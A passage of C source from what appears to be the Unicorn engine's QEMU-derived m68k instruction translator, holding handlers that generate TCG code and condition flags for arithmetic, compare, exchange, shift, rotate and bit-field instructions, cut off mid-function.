DISAS_INSN(subx_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv addr_src; TCGv dest; TCGv addr_dest; int opsize; opsize = insn_opsize(insn); addr_src = AREG(insn, 0); tcg_gen_subi_i32(tcg_ctx, addr_src, addr_src, opsize_bytes(opsize)); src = gen_load(s, opsize, addr_src, 1, IS_USER(s)); addr_dest = AREG(insn, 9); tcg_gen_subi_i32(tcg_ctx, addr_dest, addr_dest, opsize_bytes(opsize)); dest = gen_load(s, opsize, addr_dest, 1, IS_USER(s)); gen_subx(s, src, dest, opsize); gen_store(s, opsize, addr_dest, QREG_CC_N, IS_USER(s)); tcg_temp_free(tcg_ctx, dest); tcg_temp_free(tcg_ctx, src); } DISAS_INSN(mov3q) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; int val; val = (insn >> 9) & 7; if (val == 0) val = -1; src = tcg_const_i32(tcg_ctx, val); gen_logic_cc(s, src, OS_LONG); DEST_EA(env, insn, OS_LONG, src, NULL); tcg_temp_free(tcg_ctx, src); } DISAS_INSN(cmp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src, opsize, 1, NULL); reg = gen_extend(s, DREG(insn, 9), opsize, 1); gen_update_cc_cmp(s, reg, src, opsize); } DISAS_INSN(cmpa) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv src; TCGv reg; if (insn & 0x100) { opsize = OS_LONG; } else { opsize = OS_WORD; } SRC_EA(env, src, opsize, 1, NULL); reg = AREG(insn, 9); gen_update_cc_cmp(s, reg, src, OS_LONG); } DISAS_INSN(cmpm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize = insn_opsize(insn); TCGv src, dst; /* Post-increment load (mode 3) from Ay. */ src = gen_ea_mode(env, s, 3, REG(insn, 0), opsize, tcg_ctx->NULL_QREG, NULL, EA_LOADS, IS_USER(s)); /* Post-increment load (mode 3) from Ax. */ dst = gen_ea_mode(env, s, 3, REG(insn, 9), opsize, tcg_ctx->NULL_QREG, NULL, EA_LOADS, IS_USER(s)); gen_update_cc_cmp(s, dst, src, opsize); } DISAS_INSN(eor) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src, opsize, 0, &addr); dest = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, dest, src, DREG(insn, 9)); gen_logic_cc(s, dest, opsize); DEST_EA(env, insn, opsize, dest, &addr); tcg_temp_free(tcg_ctx, dest); } static void do_exg(TCGContext *tcg_ctx, TCGv reg1, TCGv reg2) { TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, temp, reg1); tcg_gen_mov_i32(tcg_ctx, reg1, reg2); tcg_gen_mov_i32(tcg_ctx, reg2, temp); tcg_temp_free(tcg_ctx, temp); } DISAS_INSN(exg_dd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* exchange Dx and Dy */ do_exg(tcg_ctx, DREG(insn, 9), DREG(insn, 0)); } DISAS_INSN(exg_aa) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* exchange Ax and Ay */ do_exg(tcg_ctx, AREG(insn, 9), AREG(insn, 0)); } DISAS_INSN(exg_da) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* exchange Dx and Ay */ do_exg(tcg_ctx, DREG(insn, 9), AREG(insn, 0)); } DISAS_INSN(and) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; TCGv dest; TCGv addr; int opsize; dest = tcg_temp_new(tcg_ctx); opsize = insn_opsize(insn); reg = DREG(insn, 9); if (insn & 0x100) { SRC_EA(env, src, opsize, 0, &addr); tcg_gen_and_i32(tcg_ctx, dest, src, reg); DEST_EA(env, insn, opsize, dest, &addr); } else { SRC_EA(env, src, opsize, 0, NULL); tcg_gen_and_i32(tcg_ctx, dest, src, reg); gen_partset_reg(tcg_ctx, opsize, reg, dest); } gen_logic_cc(s, dest, opsize); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(adda) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; SRC_EA(env, src, (insn & 0x100) ? OS_LONG : OS_WORD, 1, NULL); reg = AREG(insn, 9); tcg_gen_add_i32(tcg_ctx, reg, reg, src); } static inline void gen_addx(DisasContext *s, TCGv src, TCGv dest, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; gen_flush_flags(s); /* compute old Z */ /* * Perform addition with carry. * (X, N) = src + dest + X; */ tmp = tcg_const_i32(tcg_ctx, 0); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, QREG_CC_X, tmp, dest, tmp); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, QREG_CC_N, QREG_CC_X, src, tmp); gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); /* Compute signed-overflow for addition. */ tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, src); tcg_gen_xor_i32(tcg_ctx, tmp, dest, src); tcg_gen_andc_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, tmp); tcg_temp_free(tcg_ctx, tmp); /* Copy the rest of the results into place. */ tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); /* !Z is sticky */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); set_cc_op(s, CC_OP_FLAGS); /* result is in QREG_CC_N */ } DISAS_INSN(addx_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; TCGv src; int opsize; opsize = insn_opsize(insn); dest = gen_extend(s, DREG(insn, 9), opsize, 1); src = gen_extend(s, DREG(insn, 0), opsize, 1); gen_addx(s, src, dest, opsize); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), QREG_CC_N); } DISAS_INSN(addx_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv addr_src; TCGv dest; TCGv addr_dest; int opsize; opsize = insn_opsize(insn); addr_src = AREG(insn, 0); tcg_gen_subi_i32(tcg_ctx, addr_src, addr_src, opsize_bytes(opsize)); src = gen_load(s, opsize, addr_src, 1, IS_USER(s)); addr_dest = AREG(insn, 9); tcg_gen_subi_i32(tcg_ctx, addr_dest, addr_dest, opsize_bytes(opsize)); dest = gen_load(s, opsize, addr_dest, 1, IS_USER(s)); gen_addx(s, src, dest, opsize); gen_store(s, opsize, addr_dest, QREG_CC_N, IS_USER(s)); tcg_temp_free(tcg_ctx, dest); tcg_temp_free(tcg_ctx, src); } static inline void shift_im(DisasContext *s, uint16_t insn, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int count = (insn >> 9) & 7; int logical = insn & 8; int left = insn & 0x100; int bits = opsize_bytes(opsize) * 8; TCGv reg = gen_extend(s, DREG(insn, 0), opsize, !logical); if (count == 0) { count = 8; } tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); if (left) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, reg, bits - count); tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, reg, count); /* * Note that ColdFire always clears V (done above), * while M68000 sets if the most significant bit is changed at * any time during the shift operation. */ if (!logical && m68k_feature(s->env, M68K_FEATURE_M68000)) { /* if shift count >= bits, V is (reg != 0) */ if (count >= bits) { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, reg, QREG_CC_V); } else { TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, QREG_CC_V, reg, bits - 1); tcg_gen_sari_i32(tcg_ctx, t0, reg, bits - count - 1); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); } tcg_gen_neg_i32(tcg_ctx, QREG_CC_V, QREG_CC_V); } } else { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, reg, count - 1); if (logical) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_N, reg, count); } else { tcg_gen_sari_i32(tcg_ctx, QREG_CC_N, reg, count); } } gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, QREG_CC_C); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 0), QREG_CC_N); set_cc_op(s, CC_OP_FLAGS); } static inline void shift_reg(DisasContext *s, uint16_t insn, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int logical = insn & 8; int left = insn & 0x100; int bits = opsize_bytes(opsize) * 8; TCGv reg = gen_extend(s, DREG(insn, 0), opsize, !logical); TCGv s32; TCGv_i64 t64, s64; t64 = tcg_temp_new_i64(tcg_ctx); s64 = tcg_temp_new_i64(tcg_ctx); s32 = tcg_temp_new(tcg_ctx); /* * Note that m68k truncates the shift count modulo 64, not 32. * In addition, a 64-bit shift makes it easy to find "the last * bit shifted out", for the carry flag. */ tcg_gen_andi_i32(tcg_ctx, s32, DREG(insn, 9), 63); tcg_gen_extu_i32_i64(tcg_ctx, s64, s32); tcg_gen_extu_i32_i64(tcg_ctx, t64, reg); /* Optimistically set V=0. Also used as a zero source below. */ tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); if (left) { tcg_gen_shl_i64(tcg_ctx, t64, t64, s64); if (opsize == OS_LONG) { tcg_gen_extr_i64_i32(tcg_ctx, QREG_CC_N, QREG_CC_C, t64); /* Note that C=0 if shift count is 0, and we get that for free. */ } else { TCGv zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, QREG_CC_N, t64); tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, QREG_CC_N, bits); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, s32, zero, zero, QREG_CC_C); tcg_temp_free(tcg_ctx, zero); } tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 1); /* X = C, but only if the shift count was non-zero. */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_X, s32, QREG_CC_V, QREG_CC_C, QREG_CC_X); /* * M68000 sets V if the most significant bit is changed at * any time during the shift operation. Do this via creating * an extension of the sign bit, comparing, and discarding * the bits below the sign bit. I.e. * int64_t s = (intN_t)reg; * int64_t t = (int64_t)(intN_t)reg << count; * V = ((s ^ t) & (-1 << (bits - 1))) != 0 */ if (!logical && m68k_feature(s->env, M68K_FEATURE_M68000)) { TCGv_i64 tt = tcg_const_i64(tcg_ctx, 32); /* if shift is greater than 32, use 32 */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GT, s64, s64, tt, tt, s64); tcg_temp_free_i64(tcg_ctx, tt); /* Sign extend the input to 64 bits; re-do the shift. */ tcg_gen_ext_i32_i64(tcg_ctx, t64, reg); tcg_gen_shl_i64(tcg_ctx, s64, t64, s64); /* Clear all bits that are unchanged. */ tcg_gen_xor_i64(tcg_ctx, t64, t64, s64); /* Ignore the bits below the sign bit. */ #ifdef _MSC_VER tcg_gen_andi_i64(tcg_ctx, t64, t64, 0xffffffffffffffffULL << (bits - 1)); #else tcg_gen_andi_i64(tcg_ctx, t64, t64, -1ULL << (bits - 1)); #endif /* If any bits remain set, we have overflow. */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t64, t64, 0); tcg_gen_extrl_i64_i32(tcg_ctx, QREG_CC_V, t64); tcg_gen_neg_i32(tcg_ctx, QREG_CC_V, QREG_CC_V); } } else { tcg_gen_shli_i64(tcg_ctx, t64, t64, 32); if (logical) { tcg_gen_shr_i64(tcg_ctx, t64, t64, s64); } else { tcg_gen_sar_i64(tcg_ctx, t64, t64, s64); } tcg_gen_extr_i64_i32(tcg_ctx, QREG_CC_C, QREG_CC_N, t64); /* Note that C=0 if shift count is 0, and we get that for free. */ tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 31); /* X = C, but only if the shift count was non-zero. */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_X, s32, QREG_CC_V, QREG_CC_C, QREG_CC_X); } gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_temp_free(tcg_ctx, s32); tcg_temp_free_i64(tcg_ctx, s64); tcg_temp_free_i64(tcg_ctx, t64); /* Write back the result. */ gen_partset_reg(tcg_ctx, opsize, DREG(insn, 0), QREG_CC_N); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(shift8_im) { shift_im(s, insn, OS_BYTE); } DISAS_INSN(shift16_im) { shift_im(s, insn, OS_WORD); } DISAS_INSN(shift_im) { shift_im(s, insn, OS_LONG); } DISAS_INSN(shift8_reg) { shift_reg(s, insn, OS_BYTE); } DISAS_INSN(shift16_reg) { shift_reg(s, insn, OS_WORD); } DISAS_INSN(shift_reg) { shift_reg(s, insn, OS_LONG); } DISAS_INSN(shift_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int logical = insn & 8; int left = insn & 0x100; TCGv src; TCGv addr; SRC_EA(env, src, OS_WORD, !logical, &addr); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); if (left) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, src, 15); tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, src, 1); /* * Note that ColdFire always clears V, * while M68000 sets if the most significant bit is changed at * any time during the shift operation */ if (!logical && m68k_feature(s->env, M68K_FEATURE_M68000)) { src = gen_extend(s, src, OS_WORD, 1); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, src); } } else { tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, src); if (logical) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_N, src, 1); } else { tcg_gen_sari_i32(tcg_ctx, QREG_CC_N, src, 1); } } gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, OS_WORD, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, QREG_CC_C); DEST_EA(env, insn, OS_WORD, QREG_CC_N, &addr); set_cc_op(s, CC_OP_FLAGS); } static void rotate(TCGContext *tcg_ctx, TCGv reg, TCGv shift, int left, int size) { switch (size) { case 8: /* Replicate the 8-bit input so that a 32-bit rotate works. */ tcg_gen_ext8u_i32(tcg_ctx, reg, reg); tcg_gen_muli_i32(tcg_ctx, reg, reg, 0x01010101); goto do_long; case 16: /* Replicate the 16-bit input so that a 32-bit rotate works. */ tcg_gen_deposit_i32(tcg_ctx, reg, reg, reg, 16, 16); goto do_long; do_long: default: if (left) { tcg_gen_rotl_i32(tcg_ctx, reg, reg, shift); } else { tcg_gen_rotr_i32(tcg_ctx, reg, reg, shift); } } /* compute flags */ switch (size) { case 8: tcg_gen_ext8s_i32(tcg_ctx, reg, reg); break; case 16: tcg_gen_ext16s_i32(tcg_ctx, reg, reg); break; default: break; } /* QREG_CC_X is not affected */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, reg); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, reg); if (left) { tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, reg, 1); } else { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, reg, 31); } tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); /* always cleared */ } static void rotate_x_flags(TCGContext *tcg_ctx, TCGv reg, TCGv X, int size) { switch (size) { case 8: tcg_gen_ext8s_i32(tcg_ctx, reg, reg); break; case 16: tcg_gen_ext16s_i32(tcg_ctx, reg, reg); break; default: break; } tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, reg); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, reg); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, X); tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, X); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); } /* Result of rotate_x() is valid if 0 <= shift <= size */ static TCGv rotate_x(TCGContext *tcg_ctx, TCGv reg, TCGv shift, int left, int size) { TCGv X, shl, shr, shx, sz, zero; sz = tcg_const_i32(tcg_ctx, size); shr = tcg_temp_new(tcg_ctx); shl = tcg_temp_new(tcg_ctx); shx = tcg_temp_new(tcg_ctx); if (left) { tcg_gen_mov_i32(tcg_ctx, shl, shift); /* shl = shift */ tcg_gen_movi_i32(tcg_ctx, shr, size + 1); tcg_gen_sub_i32(tcg_ctx, shr, shr, shift); /* shr = size + 1 - shift */ tcg_gen_subi_i32(tcg_ctx, shx, shift, 1); /* shx = shift - 1 */ /* shx = shx < 0 ? size : shx; */ zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, shx, shx, zero, sz, shx); tcg_temp_free(tcg_ctx, zero); } else { tcg_gen_mov_i32(tcg_ctx, shr, shift); /* shr = shift */ tcg_gen_movi_i32(tcg_ctx, shl, size + 1); tcg_gen_sub_i32(tcg_ctx, shl, shl, shift); /* shl = size + 1 - shift */ tcg_gen_sub_i32(tcg_ctx, shx, sz, shift); /* shx = size - shift */ } tcg_temp_free_i32(tcg_ctx, sz); /* reg = (reg << shl) | (reg >> shr) | (x << shx); */ tcg_gen_shl_i32(tcg_ctx, shl, reg, shl); tcg_gen_shr_i32(tcg_ctx, shr, reg, shr); tcg_gen_or_i32(tcg_ctx, reg, shl, shr); tcg_temp_free(tcg_ctx, shl); tcg_temp_free(tcg_ctx, shr); tcg_gen_shl_i32(tcg_ctx, shx, QREG_CC_X, shx); tcg_gen_or_i32(tcg_ctx, reg, reg, shx); tcg_temp_free(tcg_ctx, shx); /* X = (reg >> size) & 1 */ X = tcg_temp_new(tcg_ctx); tcg_gen_extract_i32(tcg_ctx, X, reg, size, 1); return X; } /* Result of rotate32_x() is valid if 0 <= shift < 33 */ static TCGv rotate32_x(TCGContext *tcg_ctx, TCGv reg, TCGv shift, int left) { TCGv_i64 t0, shift64; TCGv X, lo, hi, zero; shift64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, shift64, shift); t0 = tcg_temp_new_i64(tcg_ctx); X = tcg_temp_new(tcg_ctx); lo = tcg_temp_new(tcg_ctx); hi = tcg_temp_new(tcg_ctx); if (left) { /* create [reg:X:..] */ tcg_gen_shli_i32(tcg_ctx, lo, QREG_CC_X, 31); tcg_gen_concat_i32_i64(tcg_ctx, t0, lo, reg); /* rotate */ tcg_gen_rotl_i64(tcg_ctx, t0, t0, shift64); tcg_temp_free_i64(tcg_ctx, shift64); /* result is [reg:..:reg:X] */ tcg_gen_extr_i64_i32(tcg_ctx, lo, hi, t0); tcg_gen_andi_i32(tcg_ctx, X, lo, 1); tcg_gen_shri_i32(tcg_ctx, lo, lo, 1); } else { /* create [..:X:reg] */ tcg_gen_concat_i32_i64(tcg_ctx, t0, reg, QREG_CC_X); tcg_gen_rotr_i64(tcg_ctx, t0, t0, shift64); tcg_temp_free_i64(tcg_ctx, shift64); /* result is value: [X:reg:..:reg] */ tcg_gen_extr_i64_i32(tcg_ctx, lo, hi, t0); /* extract X */ tcg_gen_shri_i32(tcg_ctx, X, hi, 31); /* extract result */ tcg_gen_shli_i32(tcg_ctx, hi, hi, 1); } tcg_temp_free_i64(tcg_ctx, t0); tcg_gen_or_i32(tcg_ctx, lo, lo, hi); tcg_temp_free(tcg_ctx, hi); /* if shift == 0, register and X are not affected */ zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, X, shift, zero, QREG_CC_X, X); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, reg, shift, zero, reg, lo); tcg_temp_free(tcg_ctx, zero); tcg_temp_free(tcg_ctx, lo); return X; } DISAS_INSN(rotate_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv shift; int tmp; int left = (insn & 0x100); tmp = (insn >> 9) & 7; if (tmp == 0) { tmp = 8; } shift = tcg_const_i32(tcg_ctx, tmp); if (insn & 8) { rotate(tcg_ctx, DREG(insn, 0), shift, left, 32); } else { TCGv X = rotate32_x(tcg_ctx, DREG(insn, 0), shift, left); rotate_x_flags(tcg_ctx, DREG(insn, 0), X, 32); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate8_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int left = (insn & 0x100); TCGv reg; TCGv shift; int tmp; reg = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); tmp = (insn >> 9) & 7; if (tmp == 0) { tmp = 8; } shift = tcg_const_i32(tcg_ctx, tmp); if (insn & 8) { rotate(tcg_ctx, reg, shift, left, 8); } else { TCGv X = rotate_x(tcg_ctx, reg, shift, left, 8); rotate_x_flags(tcg_ctx, reg, X, 8); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate16_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int left = (insn & 0x100); TCGv reg; TCGv shift; int tmp; reg = gen_extend(s, DREG(insn, 0), OS_WORD, 0); tmp = (insn >> 9) & 7; if (tmp == 0) { tmp = 8; } shift = tcg_const_i32(tcg_ctx, tmp); if (insn & 8) { rotate(tcg_ctx, reg, shift, left, 16); } else { TCGv X = rotate_x(tcg_ctx, reg, shift, left, 16); rotate_x_flags(tcg_ctx, reg, X, 16); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); gen_partset_reg(tcg_ctx, OS_WORD, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv src; TCGv t0, t1; int left = (insn & 0x100); reg = DREG(insn, 0); src = DREG(insn, 9); /* shift in [0..63] */ t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, src, 63); t1 = tcg_temp_new_i32(tcg_ctx); if (insn & 8) { tcg_gen_andi_i32(tcg_ctx, t1, src, 31); rotate(tcg_ctx, reg, t1, left, 32); /* if shift == 0, clear C */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, t0, QREG_CC_V /* 0 */, QREG_CC_V /* 0 */, QREG_CC_C); } else { TCGv X; /* modulo 33 */ tcg_gen_movi_i32(tcg_ctx, t1, 33); tcg_gen_remu_i32(tcg_ctx, t1, t0, t1); X = rotate32_x(tcg_ctx, DREG(insn, 0), t1, left); rotate_x_flags(tcg_ctx, DREG(insn, 0), X, 32); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate8_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv src; TCGv t0, t1; int left = (insn & 0x100); reg = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); src = DREG(insn, 9); /* shift in [0..63] */ t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, src, 63); t1 = tcg_temp_new_i32(tcg_ctx); if (insn & 8) { tcg_gen_andi_i32(tcg_ctx, t1, src, 7); rotate(tcg_ctx, reg, t1, left, 8); /* if shift == 0, clear C */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, t0, QREG_CC_V /* 0 */, QREG_CC_V /* 0 */, QREG_CC_C); } else { TCGv X; /* modulo 9 */ tcg_gen_movi_i32(tcg_ctx, t1, 9); tcg_gen_remu_i32(tcg_ctx, t1, t0, t1); X = rotate_x(tcg_ctx, reg, t1, left, 8); rotate_x_flags(tcg_ctx, reg, X, 8); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate16_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv src; TCGv t0, t1; int left = (insn & 0x100); reg = gen_extend(s, DREG(insn, 0), OS_WORD, 0); src = DREG(insn, 9); /* shift in [0..63] */ t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, src, 63); t1 = tcg_temp_new_i32(tcg_ctx); if (insn & 8) { tcg_gen_andi_i32(tcg_ctx, t1, src, 15); rotate(tcg_ctx, reg, t1, left, 16); /* if shift == 0, clear C */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, t0, QREG_CC_V /* 0 */, QREG_CC_V /* 0 */, QREG_CC_C); } else { TCGv X; /* modulo 17 */ tcg_gen_movi_i32(tcg_ctx, t1, 17); tcg_gen_remu_i32(tcg_ctx, t1, t0, t1); X = rotate_x(tcg_ctx, reg, t1, left, 16); rotate_x_flags(tcg_ctx, reg, X, 16); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); gen_partset_reg(tcg_ctx, OS_WORD, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv addr; TCGv shift; int left = (insn & 0x100); SRC_EA(env, src, OS_WORD, 0, &addr); shift = tcg_const_i32(tcg_ctx, 1); if (insn & 0x0200) { rotate(tcg_ctx, src, shift, left, 16); } else { TCGv X = rotate_x(tcg_ctx, src, shift, left, 16); rotate_x_flags(tcg_ctx, src, X, 16); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); DEST_EA(env, insn, OS_WORD, src, &addr); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(bfext_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); int is_sign = insn & 0x200; TCGv src = DREG(insn, 0); TCGv dst = DREG(ext, 12); int len = ((extract32(ext, 0, 5) - 1) & 31) + 1; int ofs = extract32(ext, 6, 5); /* big bit-endian */ int pos = 32 - ofs - len; /* little bit-endian */ TCGv tmp = tcg_temp_new(tcg_ctx); TCGv shift; /* * In general, we're going to rotate the field so that it's at the * top of the word and then right-shift by the complement of the * width to extend the field. */ if (ext & 0x20) { /* Variable width. */ if (ext & 0x800) { /* Variable offset. */ tcg_gen_andi_i32(tcg_ctx, tmp, DREG(ext, 6), 31); tcg_gen_rotl_i32(tcg_ctx, tmp, src, tmp); } else { tcg_gen_rotli_i32(tcg_ctx, tmp, src, ofs); } shift = tcg_temp_new(tcg_ctx); tcg_gen_neg_i32(tcg_ctx, shift, DREG(ext, 0)); tcg_gen_andi_i32(tcg_ctx, shift, shift, 31); tcg_gen_sar_i32(tcg_ctx, QREG_CC_N, tmp, shift); if (is_sign) { tcg_gen_mov_i32(tcg_ctx, dst, QREG_CC_N); } else { tcg_gen_shr_i32(tcg_ctx, dst, tmp, shift); } tcg_temp_free(tcg_ctx, shift); } else { /* Immediate width. */ if (ext & 0x800) { /* Variable offset */ tcg_gen_andi_i32(tcg_ctx, tmp, DREG(ext, 6), 31); tcg_gen_rotl_i32(tcg_ctx, tmp, src, tmp); src = tmp; pos = 32 - len; } else { /* * Immediate offset. If the field doesn't wrap around the * end of the word, rely on (s)extract completely. */ if (pos < 0) { tcg_gen_rotli_i32(tcg_ctx, tmp, src, ofs); src = tmp; pos = 32 - len; } } tcg_gen_sextract_i32(tcg_ctx, QREG_CC_N, src, pos, len); if (is_sign) { tcg_gen_mov_i32(tcg_ctx, dst, QREG_CC_N); } else { tcg_gen_extract_i32(tcg_ctx, dst, src, pos, len); } } tcg_temp_free(tcg_ctx, tmp); set_cc_op(s, CC_OP_LOGIC); } DISAS_INSN(bfext_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); int is_sign = insn & 0x200; TCGv dest = DREG(ext, 12); TCGv addr, len, ofs; addr = gen_lea(env, s, insn, OS_UNSIZED); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x20) { len = DREG(ext, 0); } else { len = tcg_const_i32(tcg_ctx, extract32(ext, 0, 5)); } if (ext & 0x800) { ofs = DREG(ext, 6); } else { ofs = tcg_const_i32(tcg_ctx, extract32(ext, 6, 5)); } if (is_sign) { gen_helper_bfexts_mem(tcg_ctx, dest, tcg_ctx->cpu_env, addr, ofs, len); tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, dest); } else { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_bfextu_mem(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, ofs, len); tcg_gen_extr_i64_i32(tcg_ctx, dest, QREG_CC_N, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } set_cc_op(s, CC_OP_LOGIC); if (!(ext & 0x20)) { tcg_temp_free(tcg_ctx, len); } if (!(ext & 0x800)) { tcg_temp_free(tcg_ctx, ofs); } } DISAS_INSN(bfop_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = 